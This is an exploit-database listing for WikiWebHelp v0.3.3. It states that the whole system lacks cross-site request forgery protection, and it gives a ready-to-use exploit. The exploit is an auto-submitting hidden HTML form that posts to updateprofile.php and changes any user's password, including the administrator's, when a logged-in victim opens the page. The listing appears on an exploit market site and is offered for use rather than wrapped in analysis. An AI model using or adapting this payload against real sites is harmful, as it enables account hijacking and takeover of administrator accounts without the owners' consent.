[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability

Author
Yoyahack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14456
Category
web applications
Date add
13-10-2010
Platform
php
===========================================================
WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability
===========================================================

#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: yoyahack@undersecurity.net
#CMS: WikiWebHelp
 
The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...
 
Example
 
Change the password of users, including the administrator.
 
Exploit:
 
<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
<script>document.CSRF.submit()</script>



#  0day.today [2024-11-15]  #